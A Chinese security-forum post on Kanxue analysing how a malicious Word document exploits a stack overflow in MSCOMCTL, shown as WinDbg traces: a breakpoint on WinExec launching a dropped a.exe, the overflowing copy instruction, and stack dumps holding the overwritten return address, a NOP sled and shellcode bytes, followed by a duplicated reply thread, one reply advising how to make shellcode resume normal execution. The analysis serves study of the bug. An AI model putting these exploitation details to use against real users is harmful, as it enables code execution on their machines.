[原创]解读天书----漏洞利用中级技巧的分析-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]解读天书----漏洞利用中级技巧的分析

发表于: 2014-2-19 11:33 13694

[原创]解读天书----漏洞利用中级技巧的分析

仙果

2014-2-19 11:33

13694

0:004> bc *
0:004> bu winexec
0:004> bl
 0 e 7c8623ad     0001 (0001)  0:**** kernel32!WinExec

0:000> da 08f36008 
08f36008  "C:\Documents and Settings\Admin\"
08f36028  "a.exe"
0:000> kvn
 # ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00120e10 001210de 08f36008 00000000 08f36008 kernel32!WinExec
01 00120e40 275c8a0a 08f15008 09ce28a8 0001c000 0x1210de
02 00120e7c 00120ef5 1005c48b c7000001 4d032400 
MSCOMCTL!DllGetClassObject+0x41cc6
03 00000000 00000000 00000000 00000000 00000000 0x120ef5

275c8a00 8d45f8          lea     eax,[ebp-8]
275c8a03 53              push    ebx
275c8a04 50              push    eax
275c8a05 e863fdffff      call    MSCOMCTL!DllGetClassObject+0x41a29 (275c876d)
275c8a0a 8bf0            mov     esi,eax

275c87be 8b750c          mov     esi,dword ptr [ebp+0Ch]
275c87c1 8bcf            mov     ecx,edi				
275c87c3 8b7d08          mov     edi,dword ptr [ebp+8]
275c87c6 8bc1            mov     eax,ecx
275c87c8 c1e902          shr     ecx,2
275c87cb f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
275c87cd 8bc8            mov     ecx,eax
275c87cf 8b4510          mov     eax,dword ptr [ebp+10h]

0:000> db esp l100
00120e30  00 00 00 00 cc 16 d2 08-10 08 00 0a 82 82 00 00  ................
00120e40  74 0e 12 00 0a 8a 5c 27-6c 0e 12 00 90 7e 1c 00  t.....\'l....~..
00120e50  82 82 00 00 00 00 00 00-cc 16 d2 08 10 08 00 0a  ................
00120e60  43 6f 62 6a 64 00 00 00-82 82 00 00 b8 17 d2 08  Cobjd...........
00120e70  e4 59 58 27 9c 0e 12 00-1a 70 5e 27 cc 16 d2 08  .YX'.....p^'....
00120e80  10 08 00 0a 00 00 00 00-a8 16 d2 08 58 74 1c 00  ............Xt..
00120e90  96 c2 5a 27 01 00 00 00-bc 0e 12 00 bc 0e 12 00  ..Z'............
00120ea0  61 73 5e 27 cc 16 d2 08-10 08 00 0a 10 08 00 0a  as^'............
00120eb0  49 74 6d 73 64 00 00 00-00 00 59 27 3c 0f 12 00  Itmsd.....Y'<...
00120ec0  b6 a8 5c 27 50 76 1c 00-10 08 00 0a a8 74 1c 00  ..\'Pv.......t..
00120ed0  58 74 1c 00 c0 ac ca 08-01 ef cd ab 00 00 05 00  Xt..............
00120ee0  98 5d 65 01 07 00 00 00-08 00 00 80 05 00 00 80  .]e.............
00120ef0  00 00 00 00 0f fa 58 27-00 00 00 00 cb 07 01 2f  ......X'......./
00120f00  de f9 58 27 00 d0 62 27-c0 ac ca 08 87 f9 58 27  ..X'..b'......X'
00120f10  e0 74 1c 00 10 08 00 0a-00 00 00 00 4e 08 7d eb  .t..........N.}.
00120f20  01 00 06 00 1c 00 00 00-00 00 00 00 00 00 00 00  ................
0:000> p

0:000> db esp l100
00120e30  00 00 00 00 cc 16 d2 08-10 08 00 0a 82 82 00 00  ................
00120e40  74 0e 12 00 0a 8a 5c 27-6c 0e 12 00 90 7e 1c 00  t.....\'l....~..
00120e50  82 82 00 00 00 00 00 00-cc 16 d2 08 10 08 00 0a  ................
00120e60  43 6f 62 6a 64 00 00 00-82 82 00 00 00 00 00 00  Cobjd...........
00120e70  00 00 00 00 00 00 00 00-12 45 fa 7f 90 90 90 90  .........E......
00120e80  90 90 90 90 8b c4 05 10-01 00 00 c7 00 24 03 4d  .............$.M
00120e90  08 e9 5a 00 00 00 6b 65-72 6e 65 6c 33 32 00 df  ..Z...kernel32..
00120ea0  2d 89 8c 1b 81 7d ef 42-9d 85 85 d6 4e 99 59 5a  -....}.B....N.YZ
00120eb0  61 d8 54 93 77 77 21 9d-4a 62 68 c3 53 a3 83 6a  a.T.ww!.Jbh.S..j
00120ec0  6b df 5c 5a 8a 1d 2b 4f-2c 45 28 81 71 f5 40 01  k.\Z..+O,E(.q.@.
00120ed0  92 8f 05 ba 36 c1 0a 61-61 61 61 73 68 65 6c 6c  ....6..aaaashell
00120ee0  33 32 00 8b 98 8a 31 61-61 61 61 6f 70 65 6e 00  32....1aaaaopen.
00120ef0  e8 11 02 00 00 6a ff e8-08 00 00 00 05 35 00 00  .....j.......5..
00120f00  00 ff 10 c3 e8 00 00 00-00 58 83 c0 04 2d 77 00  .........X...-w.
00120f10  00 00 c3 55 8b ec 52 53-8b 55 08 33 c0 f7 d0 32  ...U..RS.U.3...2
00120f20  02 b3 08 d1 e8 73 05 35-20 83 b8 ed fe cb 75 f3  .....s.5 .....u.

0:000> u eip
MSCOMCTL!DllGetClassObject+0x41d12:
275c8a56 c20800          ret     8

0:000> dd esp
00120e78  7ffa4512 90909090 90909090 1005c48b
00120e88  c7000001 4d032400 005ae908 656b0000

275c87c1 8bcf            mov     ecx,edi		//把拷贝长度赋给ecx
275c87c3 8b7d08          mov     edi,dword ptr [ebp+8]
275c87c6 8bc1            mov     eax,ecx
275c87c8 c1e902          shr     ecx,2			//右移2位
275c87cb f3a5            rep movs dword ptr es:[edi],dword ptr [esi]	//拷贝
275c87cd 8bc8            mov     ecx,eax
275c87cf 8b4510          mov     eax,dword ptr [ebp+10h]

0:000> r
eax=00008282 ebx=09520810 ecx=000020a0 edx=00000000 esi=08cfefb8 edi=00120e6c
eip=275c87cb esp=00120e30 ebp=00120e40 iopl=0         nv up ei pl nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000207
MSCOMCTL!DllGetClassObject+0x41a87:
275c87cb f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

0:000> dds esp
00120e30  00000000
00120e34  00192ed4
00120e38  09520810
00120e3c  00008282
00120e40  00120e74
00120e44  275c8a0a MSCOMCTL!DllGetClassObject+0x41cc6
00120e48  00120e6c
00120e4c  08cfefb8
00120e50  00008282
00120e54  00000000
00120e58  00192ed4
00120e5c  09520810
00120e60  6a626f43
00120e64  00000064
00120e68  00008282
00120e6c  00192fc0
00120e70  275859e4 MSCOMCTL!DllCanUnloadNow+0x2a31
00120e74  00120e9c
00120e78  275e701a MSCOMCTL!DLLGetDocumentation+0xd08
00120e7c  00192ed4
00120e80  09520810
00120e84  00000000
00120e88  00192eb0
00120e8c  08cfea50
00120e90  275ac296 MSCOMCTL!DllGetClassObject+0x25552
00120e94  00000001
00120e98  00120ebc
00120e9c  00120ebc
00120ea0  275e7361 MSCOMCTL!DLLGetDocumentation+0x104f
00120ea4  00192ed4
00120ea8  09520810
00120eac  09520810
00120eac  09520810
00120eb0  736d7449
00120eb4  00000064
00120eb8  27590000 MSCOMCTL!DllGetClassObject+0x92bc
00120ebc  00120f3c
00120ec0  275ca8b6 MSCOMCTL!DllGetClassObject+0x43b72
00120ec4  08cfec48
00120ec8  09520810
00120ecc  08cfeaa0
00120ed0  08cfea50
00120ed4  08c84088
00120ed8  abcdef01
00120edc  00050000
00120ee0  01655d98 xpsp2res+0x65d98

00120e70  275859e4 MSCOMCTL!DllCanUnloadNow+0x2a31

eax=8000ffff ebx=002158f0 ecx=08190000 edx=00000000 esi=00190b48 edi=00000000
eip=275e7049 esp=00120ea0 ebp=00120ebc iopl=0         nv up ei ng nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000286
MSCOMCTL!DLLGetDocumentation+0xd37:
275e7049 c20800          ret     8

ESP:
00120ea0 275e7361 MSCOMCTL!DLLGetDocumentation+0x104f
00120ea4 00190b6c 
00120ea8 08540810 
00120eac 08540810 
00120eb0 736d7449 
00120eb4 00000064 
00120eb8 27590000 MSCOMCTL!DllGetClassObject+0x92bc
00120ebc 00120f3c 
0:000> kvn
 # ChildEBP RetAddr  Args to Child              
00120ebc 275ca8b6 00215ae8 08540810 00215940 MSCOMCTL!DLLGetDocumentation+0xd37
01 00120f3c 2758aee8 002158f0 00000000 08540810 MSCOMCTL!DllGetClassObject+0x43b72
02 00120f6c 27600908 00215940 08540810 00000000 MSCOMCTL!DllGetClassObject+0x41a4
03 00120f80 302e3b3f 00215944 08540810 00000000 MSCOMCTL!DllUnregisterServer+0xc31
04 00121014 30296275 00000000 00000000 0146edbc WINWORD+0x2e3b3f
05 00121068 304c49a1 00000000 00000000 00000001 WINWORD+0x296275
06 001210e0 302e12d6 00000001 00000000 00000000 WINWORD+0x4c49a1
07 0012119c 300443b6 0146c814 00000002 0012156c WINWORD+0x2e12d6

登录后可查看完整内容

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

上传的附件：

11111111111111111.png （46.14kb，12次下载）
22222222222222.jpg （17.53kb，3次下载）
33333333333333.jpg （48.10kb，15次下载）
解读天书----漏洞利用中级技巧的分析.doc （594.50kb，381次下载）

收藏・79

免费・5

支持

最新回复 (66) 1 2 3 ▶
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 2 楼终于编辑完成了，力气活啊，终于知道别人为什么直接发附件 2014-2-19 11:37 0
hrpirip 雪币： 55 活跃值： (519) 能力值： ( LV6，RANK：80 ) 在线值：发帖 48 回帖 407 粉丝 2 关注私信	hrpirip 1 3 楼支持啊。又一篇超级精华文。深深膜拜。 2014-2-19 11:50 0
orz1ruo 雪币： 16468 活跃值： (2493) 能力值： ( LV9，RANK：147 ) 在线值：发帖 1 回帖 611 粉丝 9 关注私信	orz1ruo 4 楼前来支持一下,又一精华贴.虽然说我看不懂. 2014-2-19 11:53 0
安于此生雪币： 2664 活跃值： (3401) 能力值： ( LV13，RANK：1760 ) 在线值：发帖 103 回帖 2020 粉丝 199 关注私信	安于此生 34 5 楼顶仙果,这是最终方向... 2014-2-19 11:55 0
小W 雪币： 49 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 105 粉丝 0 关注私信	小W 6 楼高手挖漏洞的境界，我等只能膜拜。。。。。。 2014-2-19 12:23 0
mms 雪币： 1344 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 165 粉丝 0 关注私信	mms 7 楼看天书 2014-2-19 12:25 0
ling林雪币： 110 活跃值： (308) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 105 粉丝 0 关注私信	ling林 8 楼 mark...... 2014-2-19 12:27 0
LeavesBNW 雪币： 29 活跃值： (40) 能力值： ( LV5，RANK：60 ) 在线值：发帖 2 回帖 31 粉丝 0 关注私信	LeavesBNW 1 9 楼用心写出来的文章，怎可草草看完，一个汉字都没落下地看完了，此分析类的文章多多益善，因为思路比技术更重要。 2014-2-19 12:44 0
whnet 雪币： 185 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 22 回帖 1029 粉丝 0 关注私信	whnet 10 楼先mark . 暂时留着，后面仔细阅读。 2014-2-19 15:55 0
pencil 雪币： 1163 活跃值： (137) 能力值： ( LV12，RANK：230 ) 在线值：发帖 22 回帖 680 粉丝 1 关注私信	pencil 5 11 楼速度自己主动射精 2014-2-19 16:42 0
lizhenzhe 雪币： 500 活跃值： (990) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 186 粉丝 0 关注私信	lizhenzhe 12 楼 :coolmark后看 2014-2-19 16:56 0
kindsjay 雪币： 310 活跃值： (159) 能力值： ( LV12，RANK：200 ) 在线值：发帖 21 回帖 118 粉丝 1 关注私信	kindsjay 4 13 楼你开始发表著作了？ 2014-2-19 16:58 0
option 雪币： 8201 活跃值： (2701) 能力值： ( LV2，RANK：10 ) 在线值：发帖 39 回帖 713 粉丝 1 关注私信	option 14 楼不太明白，学习一下了 2014-2-19 18:44 0
JingSao 雪币： 95 活跃值： (119) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 91 粉丝 0 关注私信	JingSao 15 楼太牛叉了，只看懂了一点点 2014-2-19 18:56 0
HelloCrack 雪币： 215 活跃值： (90) 能力值： ( LV3，RANK：30 ) 在线值：发帖 20 回帖 209 粉丝 1 关注私信	HelloCrack 16 楼要做到完美利用，shellcode执行完后跳到以前的ret地址，对比正常流程与溢出后流程的差异，shellcode中修复这些差异即可。其实就类似hook技术，hook后先执行一段自己的代码，最后跳回以前的ret地址。 2014-2-20 08:56 0
zrhai 雪币： 230 活跃值： (106) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 181 粉丝 0 关注私信	zrhai 17 楼很有收获，多谢分享! 2014-2-20 09:15 0
white、、雪币： 60 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 387 粉丝 0 关注私信	white、、 18 楼十分精彩，膜拜。 2014-2-20 09:46 0
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 19 楼 freebuf上也见到了呢。木有给金币的说………… 哈哈 2014-2-20 09:53 0
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 20 楼 freebuf上的ID是：夜未央。哈哈，仙果大牛也用小号啊。 2014-2-20 09:55 0
冰翼show 雪币： 34 活跃值： (40) 能力值： ( LV5，RANK：60 ) 在线值：发帖 7 回帖 36 粉丝 0 关注私信	冰翼show 1 21 楼哈哈，编辑的确是个累活 2014-2-20 13:21 0
uuwhat 雪币： 29 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 150 粉丝 0 关注私信	uuwhat 22 楼辛苦啦！终于看完了！ 2014-2-20 16:04 0
Greater 雪币： 13 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 230 粉丝 0 关注私信	Greater 23 楼好东西深深膜拜啦 2014-2-20 18:23 0
kenjidaye 雪币： 64 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 17 回帖 31 粉丝 0 关注私信	kenjidaye 24 楼解读天书----漏洞利用中级技巧的分析 2014-2-20 22:21 0
JoySauce 雪币： 341 活跃值： (85) 能力值： ( LV5，RANK：70 ) 在线值：发帖 6 回帖 185 粉丝 0 关注私信	JoySauce 1 25 楼 mark 2014-2-20 22:40 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

仙果

发帖

1507

回帖

860

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (66) 1 2 3 ▶
仙果雪币： 1491 活跃值： (985) 能力值： (RANK：860 ) 在线值：发帖 68 回帖 1507 粉丝 67 关注私信	仙果 19 2 楼终于编辑完成了，力气活啊，终于知道别人为什么直接发附件 2014-2-19 11:37 0
hrpirip 雪币： 55 活跃值： (519) 能力值： ( LV6，RANK：80 ) 在线值：发帖 48 回帖 407 粉丝 2 关注私信	hrpirip 1 3 楼支持啊。又一篇超级精华文。深深膜拜。 2014-2-19 11:50 0
orz1ruo 雪币： 16468 活跃值： (2493) 能力值： ( LV9，RANK：147 ) 在线值：发帖 1 回帖 611 粉丝 9 关注私信	orz1ruo 4 楼前来支持一下,又一精华贴.虽然说我看不懂. 2014-2-19 11:53 0
安于此生雪币： 2664 活跃值： (3401) 能力值： ( LV13，RANK：1760 ) 在线值：发帖 103 回帖 2020 粉丝 199 关注私信	安于此生 34 5 楼顶仙果,这是最终方向... 2014-2-19 11:55 0
小W 雪币： 49 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 105 粉丝 0 关注私信	小W 6 楼高手挖漏洞的境界，我等只能膜拜。。。。。。 2014-2-19 12:23 0
mms 雪币： 1344 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 165 粉丝 0 关注私信	mms 7 楼看天书 2014-2-19 12:25 0
ling林雪币： 110 活跃值： (308) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 105 粉丝 0 关注私信	ling林 8 楼 mark...... 2014-2-19 12:27 0
LeavesBNW 雪币： 29 活跃值： (40) 能力值： ( LV5，RANK：60 ) 在线值：发帖 2 回帖 31 粉丝 0 关注私信	LeavesBNW 1 9 楼用心写出来的文章，怎可草草看完，一个汉字都没落下地看完了，此分析类的文章多多益善，因为思路比技术更重要。 2014-2-19 12:44 0
whnet 雪币： 185 活跃值： (25) 能力值： ( LV2，RANK：10 ) 在线值：发帖 22 回帖 1029 粉丝 0 关注私信	whnet 10 楼先mark . 暂时留着，后面仔细阅读。 2014-2-19 15:55 0
pencil 雪币： 1163 活跃值： (137) 能力值： ( LV12，RANK：230 ) 在线值：发帖 22 回帖 680 粉丝 1 关注私信	pencil 5 11 楼速度自己主动射精 2014-2-19 16:42 0
lizhenzhe 雪币： 500 活跃值： (990) 能力值： ( LV2，RANK：10 ) 在线值：发帖 6 回帖 186 粉丝 0 关注私信	lizhenzhe 12 楼 :coolmark后看 2014-2-19 16:56 0
kindsjay 雪币： 310 活跃值： (159) 能力值： ( LV12，RANK：200 ) 在线值：发帖 21 回帖 118 粉丝 1 关注私信	kindsjay 4 13 楼你开始发表著作了？ 2014-2-19 16:58 0
option 雪币： 8201 活跃值： (2701) 能力值： ( LV2，RANK：10 ) 在线值：发帖 39 回帖 713 粉丝 1 关注私信	option 14 楼不太明白，学习一下了 2014-2-19 18:44 0
JingSao 雪币： 95 活跃值： (119) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 91 粉丝 0 关注私信	JingSao 15 楼太牛叉了，只看懂了一点点 2014-2-19 18:56 0
HelloCrack 雪币： 215 活跃值： (90) 能力值： ( LV3，RANK：30 ) 在线值：发帖 20 回帖 209 粉丝 1 关注私信	HelloCrack 16 楼要做到完美利用，shellcode执行完后跳到以前的ret地址，对比正常流程与溢出后流程的差异，shellcode中修复这些差异即可。其实就类似hook技术，hook后先执行一段自己的代码，最后跳回以前的ret地址。 2014-2-20 08:56 0
zrhai 雪币： 230 活跃值： (106) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 181 粉丝 0 关注私信	zrhai 17 楼很有收获，多谢分享! 2014-2-20 09:15 0
white、、雪币： 60 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 7 回帖 387 粉丝 0 关注私信	white、、 18 楼十分精彩，膜拜。 2014-2-20 09:46 0
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 19 楼 freebuf上也见到了呢。木有给金币的说………… 哈哈 2014-2-20 09:53 0
gamehacker 雪币： 131 活跃值： (98) 能力值： ( LV5，RANK：60 ) 在线值：发帖 12 回帖 334 粉丝 2 关注私信	gamehacker 1 20 楼 freebuf上的ID是：夜未央。哈哈，仙果大牛也用小号啊。 2014-2-20 09:55 0
冰翼show 雪币： 34 活跃值： (40) 能力值： ( LV5，RANK：60 ) 在线值：发帖 7 回帖 36 粉丝 0 关注私信	冰翼show 1 21 楼哈哈，编辑的确是个累活 2014-2-20 13:21 0
uuwhat 雪币： 29 活跃值： (16) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 150 粉丝 0 关注私信	uuwhat 22 楼辛苦啦！终于看完了！ 2014-2-20 16:04 0
Greater 雪币： 13 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 230 粉丝 0 关注私信	Greater 23 楼好东西深深膜拜啦 2014-2-20 18:23 0
kenjidaye 雪币： 64 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 17 回帖 31 粉丝 0 关注私信	kenjidaye 24 楼解读天书----漏洞利用中级技巧的分析 2014-2-20 22:21 0
JoySauce 雪币： 341 活跃值： (85) 能力值： ( LV5，RANK：70 ) 在线值：发帖 6 回帖 185 粉丝 0 关注私信	JoySauce 1 25 楼 mark 2014-2-20 22:40 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复